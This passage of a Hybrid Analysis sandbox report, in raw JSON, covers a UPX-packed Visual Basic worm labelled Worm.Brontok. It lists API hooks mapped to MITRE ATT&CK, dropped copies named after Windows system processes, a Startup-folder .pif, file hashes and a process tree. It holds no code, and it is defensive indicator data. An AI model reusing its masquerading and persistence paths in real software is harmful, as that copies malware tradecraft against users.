\"IExplorer.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"SERVICES.EXE\"\n \"send@WS2_32.DLL\" in \"D3_08.exe\"\n \"send@WS2_32.DLL\" in \"LSASS.EXE\"\n \"send@WS2_32.DLL\" in \"IExplorer.exe\"\n \"send@WS2_32.DLL\" in \"WINLOGON.EXE\"\n \"send@WS2_32.DLL\" in \"SMSS.EXE\"\n \"send@WS2_32.DLL\" in \"CSRSS.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43
https://hybrid-analysis.com/sample/50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43
Hybrid Analysis - Killers
{"size": 47177, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "submit_name": "50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43", "sha256": "50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43", "av_detect": 87, "vx_family": "Worm.Brontok", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 64, "total_signatures": 148, "extracted_files": [{"name": "services.exe", "file_size": 47177, "sha256": "50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "lsass.exe", "file_size": 47177, "sha256": "50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "IExplorer.exe", "file_size": 47177, "sha256": "50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SERVICES.EXE (PID: 2632)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "4k51k4.exe", "file_size": 47177, "sha256": "50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SERVICES.EXE (PID: 2632)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "winlogon.exe", "file_size": 47177, "sha256": "50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "smss.exe", "file_size": 47177, "sha256": "50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "csrss.exe", "file_size": 47177, "sha256": "50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "LSASS.EXE", "file_size": 47177, "sha256": "50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SERVICES.EXE (PID: 2632)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "SMSS.EXE", "file_size": 47177, "sha256": "50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SERVICES.EXE (PID: 2632)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_size": 47177, "sha256": "50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SERVICES.EXE (PID: 2632)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_size": 47177, "sha256": "50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SERVICES.EXE (PID: 2632)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_size": 47177, "sha256": "50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SERVICES.EXE (PID: 2632)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "Empty.pif", "file_path": "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif", "file_size": 47177, "sha256": "d55b74d23e21680389f118b1e0d066fe054df842be408e3b1f8c9909fb81f110", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SERVICES.EXE (PID: 2632)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE", "file_size": 47177, "sha256": "d351d068d4d2008fdf6f3495a24c107fee3b492c9d06c5f34ece67c4ec8d1d61", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SERVICES.EXE (PID: 2632)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE", "file_size": 47177, "sha256": "d35464a58ab8c189a7b488f57abe895dd8d7dde74d619a183f86986dc4805734", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SERVICES.EXE (PID: 2632)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE", "file_size": 47177, "sha256": "10a9c99e6678348bd8a2f5ecc5c17362fa2bad200324a7f23a9bae46984595b7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SERVICES.EXE (PID: 2632)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE", "file_size": 47177, "sha256": "ecd4fad6e89fd038a2e220f07f979e6e2ce57548fdb3b4a156510bc3d5129ccb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SERVICES.EXE (PID: 2632)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE", "file_size": 47177, "sha256": "10a9c99e6678348bd8a2f5ecc5c17362fa2bad200324a7f23a9bae46984595b7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SERVICES.EXE (PID: 2632)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4k51k4.exe", "file_path": "%WINDIR%\\4k51k4.exe", "file_size": 47177, "sha256": "945c634ec4e7f029f689ce7010d62e21da4ac2a89f1c0840db4f06085767fa17", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SERVICES.EXE (PID: 2632)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_path": "%WINDIR%\\System32\\IExplorer.exe", "file_size": 47177, "sha256": "c1599d7c403046d95e413fadf8149edfa8fa1c80bbf07de14fce966ab84966ec", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SERVICES.EXE (PID: 2632)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "MrHelloween.scr", "file_path": "%WINDIR%\\System32\\MrHelloween.scr", "file_size": 47177, "sha256": "4ee6dd867f6b511658a54bf3ef4cfd6685a9fb20d88278e06089680870164d35", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SERVICES.EXE (PID: 2632)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "shell.exe", "file_path": "%WINDIR%\\System32\\shell.exe", "file_size": 47177, "sha256": "de483c023d45a050eb96ce41dd87ccc4e92bc568baf049f71c367309dd1f739d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SERVICES.EXE (PID: 2632)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4k51k4.exe", "file_path": "C:\\4k51k4.exe", "file_size": 47177, "sha256": "56c36dccff7fb6e3f2cf844debcf663e700983fcfd34ce9d13ca8adb0ae27960", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SERVICES.EXE (PID: 2632)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Puisi.txt", "file_path": "C:\\Puisi.txt", "file_size": 442, "sha256": "660ecfcd91ba19959d0c348724da95d7fd6dd57359898e6e3bcce600ff3c797d", "type_tags": ["text"], "description": "ASCII text, with CRLF line terminators", "runtime_process": "SERVICES.EXE (PID: 2632)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS .exe", "file_size": 47177, "sha256": "f23820a3f13489cd44067fc96acbd07dd75efa81b96221207173a1acb2e42e0c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "New Folder.exe", "file_size": 47177, "sha256": "e2ce2ae5b80b4bc7123009f34800f01f3c7a6cfbc80545568a2640d0cc5fd7e5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Data HAPUBWS.exe", "file_size": 47177, "sha256": "be86c5adbfc26844ff4c807777cb4e729861ed6be8d5d5b98d4ecf7e66acf410", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE.bin", "file_size": 47177, "sha256": "10a9c99e6678348bd8a2f5ecc5c17362fa2bad200324a7f23a9bae46984595b7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67A9CA14.bin", "file_size": 47177, "sha256": "c1599d7c403046d95e413fadf8149edfa8fa1c80bbf07de14fce966ab84966ec", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE.bin", "file_size": 47177, "sha256": "21e2f7376cdc6f34ddb316e26be76326a97125b580376e2862f777c0f7a4af56", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9C477.bin", "file_size": 47177, "sha256": "7ce9248030720e5cd61ab98ac473d890988357db3c4462781b85f2f534e47650", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9C852.bin", "file_size": 47177, "sha256": "7371c170b17bab1ce11e0f8470bc6a04593ec3272bd6ef0836b4b7e04249f0a5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67A9C855.bin", "file_size": 47177, "sha256": "98f1ce66b03bf910a5ceffa492e0ddf909e2e014eb259edfd94232fd8ab8a33c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67A9C479.bin", "file_size": 47177, "sha256": "ab2119e643906c3c98fc90ef79ab786aeb269f9094f88b9e4f708c4c956499f5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9CA11.bin", "file_size": 47177, "sha256": "945c634ec4e7f029f689ce7010d62e21da4ac2a89f1c0840db4f06085767fa17", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .BAS (Pseudo-Code) Files compiled with C2.EXE 6.0 (Visual Basic 6) (build: 8169)"], "imported_objects": [], "file_analysis": ["File contains Visual Basic code", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00006024", "name": "50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe", "normalized_path": "C:\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe", "sha256": "50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22}, {"uid": "00000000-00005832", "parentuid": "00000000-00006024", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "7ce9248030720e5cd61ab98ac473d890988357db3c4462781b85f2f534e47650"}, {"uid": "00000000-00006128", "parentuid": "00000000-00005832", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "7ce9248030720e5cd61ab98ac473d890988357db3c4462781b85f2f534e47650"}, {"uid": "00000000-00004140", "parentuid": "00000000-00005832", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "ab2119e643906c3c98fc90ef79ab786aeb269f9094f88b9e4f708c4c956499f5"}, {"uid": "00000000-00005992", "parentuid": "00000000-00005832", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "b584c907eb2f762c9532b9735a55b39cf9ec489295116bf82621d490cf2418f6"}, {"uid": "00000000-00003572", "parentuid": "00000000-00005832", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "56484a087e449f8c7a5815f2e835e9f36caa1bf446533c71c3386d86f2bc0212"}, {"uid": "00000000-00001200", "parentuid": "00000000-00003572", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "7ce9248030720e5cd61ab98ac473d890988357db3c4462781b85f2f534e47650"}, {"uid": "00000000-00004128", "parentuid": "00000000-00003572", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "ab2119e643906c3c98fc90ef79ab786aeb269f9094f88b9e4f708c4c956499f5"}, {"uid": "00000000-00003660", "parentuid": "00000000-00003572", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "b584c907eb2f762c9532b9735a55b39cf9ec489295116bf82621d490cf2418f6"}, {"uid": "00000000-00003516", "parentuid": "00000000-00003572", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "56484a087e449f8c7a5815f2e835e9f36caa1bf446533c71c3386d86f2bc0212"}, {"uid": "00000000-00000700", "parentuid": "00000000-00003572", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f94a6ff679b8c725510d038a0c211f1fad9efa71ddd396267234f475cee2847c"}, {"uid": "00000000-00002916", "parentuid": "00000000-00003572", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "de483c023d45a050eb96ce41dd87ccc4e92bc568baf049f71c367309dd1f739d"}, {"uid": "00000000-00001784", "parentuid": "00000000-00003572", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "f94a6ff679b8c725510d038a0c211f1fad9efa71ddd396267234f475cee2847c"}, {"uid": "00000000-00002660", "parentuid": "00000000-00005832", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f94a6ff679b8c725510d038a0c211f1fad9efa71ddd396267234f475cee2847c"}, {"uid": "00000000-00004224", "parentuid": "00000000-00005832", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "de483c023d45a050eb96ce41dd87ccc4e92bc568baf049f71c367309dd1f739d"}, {"uid": "00000000-00002852", "parentuid": "00000000-00004224", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "7ce9248030720e5cd61ab98ac473d890988357db3c4462781b85f2f534e47650"}, {"uid": "00000000-00004204", "parentuid": "00000000-00004224", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "ab2119e643906c3c98fc90ef79ab786aeb269f9094f88b9e4f708c4c956499f5"}, {"uid": "00000000-00003256", "parentuid": "00000000-00004224", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "b584c907eb2f762c9532b9735a55b39cf9ec489295116bf82621d490cf2418f6"}, {"uid": "00000000-00000476", "parentuid": "00000000-00004224", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "56484a087e449f8c7a5815f2e835e9f36caa1bf446533c71c3386d86f2bc0212"}, {"uid": "00000000-00000956", "parentuid": "00000000-00004224", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f94a6ff679b8c725510d038a0c211f1fad9efa71ddd396267234f475cee2847c"}, {"uid": "00000000-00000876", "parentuid": "00000000-00004224", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "de483c023d45a050eb96ce41dd87ccc4e92bc568baf049f71c367309dd1f739d"}, {"uid": "00000000-00001184", "parentuid": "00000000-00004224", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "f94a6ff679b8c725510d038a0c211f1fad9efa71ddd396267234f475cee2847c"}, {"uid": "00000000-00001880", "parentuid": "00000000-00005832", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "f94a6ff679b8c725510d038a0c211f1fad9efa71ddd396267234f475cee2847c"}, {"uid": "00000000-00004312", "parentuid": "00000000-00006024", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "ab2119e643906c3c98fc90ef79ab786aeb269f9094f88b9e4f708c4c956499f5"}, {"uid": "00000000-00005932", "parentuid": "00000000-00004312", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "7ce9248030720e5cd61ab98ac473d890988357db3c4462781b85f2f534e47650"}, {"uid": "00000000-00002744", "parentuid": "00000000-00004312", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "ab2119e643906c3c98fc90ef79ab786aeb269f9094f88b9e4f708c4c956499f5"}, {"uid": "00000000-00003780", "parentuid": "00000000-00004312", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "b584c907eb2f762c9532b9735a55b39cf9ec489295116bf82621d490cf2418f6"}, {"uid": "00000000-00003556", "parentuid": "00000000-00004312", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "56484a087e449f8c7a5815f2e835e9f36caa1bf446533c71c3386d86f2bc0212"}, {"uid": "00000000-00002236", "parentuid": "00000000-00004312", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f94a6ff679b8c725510d038a0c211f1fad9efa71ddd396267234f475cee2847c"}, {"uid": "00000000-00004396", "parentuid": "00000000-00004312", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "de483c023d45a050eb96ce41dd87ccc4e92bc568baf049f71c367309dd1f739d"}, {"uid": "00000000-00003588", "parentuid": "00000000-00004312", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "f94a6ff679b8c725510d038a0c211f1fad9efa71ddd396267234f475cee2847c"}, {"uid": "00000000-00004304", "parentuid": "00000000-00006024", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "b584c907eb2f762c9532b9735a55b39cf9ec489295116bf82621d490cf2418f6"}, {"uid": "00000000-00004456", "parentuid": "00000000-00004304", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "7ce9248030720e5cd61ab98ac473d890988357db3c4462781b85f2f534e47650"}, {"uid": "00000000-00002044", "parentuid": "00000000-00004304", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "ab2119e643906c3c98fc90ef79ab786aeb269f9094f88b9e4f708c4c956499f5"}, {"uid": "00000000-00003856", "parentuid": "00000000-00004304", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "b584c907eb2f762c9532b9735a55b39cf9ec489295116bf82621d490cf2418f6"}, {"uid": "00000000-00003252", "parentuid": "00000000-00004304", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "56484a087e449f8c7a5815f2e835e9f36caa1bf446533c71c3386d86f2bc0212"}, {"uid": "00000000-00001420", "parentuid": "00000000-00004304", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f94a6ff679b8c725510d038a0c211f1fad9efa71ddd396267234f475cee2847c"}, {"uid": "00000000-00001332", "parentuid": "00000000-00004304", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "de483c023d45a050eb96ce41dd87ccc4e92bc568baf049f71c367309dd1f739d"}, {"uid": "00000000-00001616", "parentuid": "00000000-00004304", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "f94a6ff679b8c725510d038a0c211f1fad9efa71ddd396267234f475cee2847c"}, {"uid": "00000000-00003560", "parentuid": "00000000-00006024", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "56484a087e449f8c7a5815f2e835e9f36caa1bf446533c71c3386d86f2bc0212"}, {"uid": "00000000-00002632", "parentuid": "00000000-00006024", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f94a6ff679b8c725510d038a0c211f1fad9efa71ddd396267234f475cee2847c"}, {"uid": "00000000-00002644", "parentuid": "00000000-00002632", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "7ce9248030720e5cd61ab98ac473d890988357db3c4462781b85f2f534e47650"}, {"uid": "00000000-00004356", "parentuid": "00000000-00002632", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "ab2119e643906c3c98fc90ef79ab786aeb269f9094f88b9e4f708c4c956499f5"}, {"uid": "00000000-00003260", "parentuid": "00000000-00002632", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "b584c907eb2f762c9532b9735a55b39cf9ec489295116bf82621d490cf2418f6"}, {"uid": "00000000-00003296", "parentuid": "00000000-00002632", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "56484a087e449f8c7a5815f2e835e9f36caa1bf446533c71c3386d86f2bc0212"}, {"uid": "00000000-00004488", "parentuid": "00000000-00002632", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f94a6ff679b8c725510d038a0c211f1fad9efa71ddd396267234f475cee2847c"}, {"uid": "00000000-00003968", "parentuid": "00000000-00002632", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "de483c023d45a050eb96ce41dd87ccc4e92bc568baf049f71c367309dd1f739d"}, {"uid": "00000000-00003344", "parentuid": "00000000-00002632", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "f94a6ff679b8c725510d038a0c211f1fad9efa71ddd396267234f475cee2847c"}, {"uid": "00000000-00004404", "parentuid": "00000000-00006024", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "de483c023d45a050eb96ce41dd87ccc4e92bc568baf049f71c367309dd1f739d"}, {"uid": "00000000-00004380", "parentuid": "00000000-00006024", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "f94a6ff679b8c725510d038a0c211f1fad9efa71ddd396267234f475cee2847c"}, {"uid": "00000000-00000596", "parentuid": "00000000-00004380", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "7ce9248030720e5cd61ab98ac473d890988357db3c4462781b85f2f534e47650"}, {"uid": "00000000-00001480", "parentuid": "00000000-00004380", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "ab2119e643906c3c98fc90ef79ab786aeb269f9094f88b9e4f708c4c956499f5"}, {"uid": "00000000-00000900", "parentuid": "00000000-00004380", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "b584c907eb2f762c9532b9735a55b39cf9ec489295116bf82621d490cf2418f6"}, {"uid": "00000000-00002572", "parentuid": "00000000-00004380", "name": "CSRSS.EXE", "normalized_path": 